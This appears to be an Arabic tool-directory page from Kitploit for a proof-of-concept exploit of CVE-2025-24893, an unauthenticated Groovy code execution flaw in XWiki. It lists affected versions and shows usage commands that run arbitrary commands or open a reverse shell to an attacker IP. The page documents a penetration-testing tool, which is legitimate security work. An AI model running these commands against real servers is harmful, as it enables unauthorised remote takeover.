Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-24893-PoC — XWiki استغلال تنفيذ الأوامر عن بعد بدون مصادقة لقشرة عكسية | Kitploit
أدوات/GitHubGitHub/80ottanta80/cve-2025-24893-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHub80ottanta80/cve-2025-24893-poc

CVE-2025-24893-PoC

XWiki استغلال تنفيذ الأوامر عن بعد بدون مصادقة لقشرة عكسية

عرض المستودع
1منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-24893-PoC

XWiki استغلال RCE بدون مصادقة

إصدارات XWiki المتأثرة

  • الإصدارات < 15.10.11
  • الإصدارات < 16.4.1
  • الإصدارات < 16.5.0RC1

وصف الثغرة

تحتوي إصدارات XWiki المتأثرة على ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) ناتجة عن معالجة غير آمنة لتعبيرات Groovy في ماكرو SolrSearch. يمكن للمهاجمين غير المصادق عليهم تنفيذ تعليمات Groovy برمجية عشوائية عن بُعد والحصول على قوقعة عكسية (reverse shell).

إثبات المفهوم

يمكن استخدام هذا الاستغلال لتنفيذ تعليمات برمجية على الجهاز الهدف ويمكنه أيضًا إنشاء قوقعة عكسية. هناك وضعان متاحان: تفاعلي أو قائم على المعاملات. يمكن للاستغلال تشغيل مستمع تلقائيًا أو استخدام مستمع موجود.

مخرجات XWiki التفاعلية

المتطلبات الأساسية

جهاز المهاجم

  • Python 3
  • سكريبت الاستغلال
  • Netcat (إذا لم تستخدم المستمع التلقائي)

الجهاز الهدف

  • إصدار XWiki ضعيف
  • اتصال شبكي بجهاز المهاجم

الاستخدام

الوضع التفاعلي

root@kitploit:~
python3 xwiki_groovy_rce.py

الوضع القائم على المعاملات

root@kitploit:~
# Remote Code Execution
python3 xwiki_groovy_rce.py --code "mkdir test" -u http://example.com

# Reverse Shell with automatic listener (default)
python3 xwiki_groovy_rce.py --reverse-shell -u http://example.com -i YOUR_IP -p 4480

# Reverse Shell without existing listener (no automatic listener)
python3 xwiki_groovy_rce.py --reverse-shell -u http://example.com -i YOUR_IP -p 4480 --no-listener

المعاملات

-h/--help: عرض قائمة المساعدة

-u/--url: رابط XWiki الهدف (مطلوب)

-r/--reverse-shell: تنفيذ قوقعة عكسية

-c/--command: تنفيذ أمر واحد

-i/--ip: تحديد عنوان IP للمستمع (للقوقعة العكسية فقط)

-p/--port: تحديد منفذ المستمع (للقوقعة العكسية فقط، الافتراضي=4444)

--no-listener: لا تبدأ مستمعًا (للقوقعة العكسية فقط)

المراجع

  • https://github.com/dollarboysushil/CVE-2025-24893-XWiki-Unauthenticated-RCE-Exploit-POC/tree/main
  • https://nvd.nist.gov/vuln/detail/CVE-2025-24893
  • https://www.offsec.com/blog/cve-2025-24893/

إخلاء مسؤولية قانوني

إثبات المفهوم هذا مخصص للأغراض التعليمية والاختبار المصرح به فقط.

الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها غير قانوني.

المؤلفون غير مسؤولين عن أي إساءة استخدام لهذه المعلومات.

تنزيل الأداة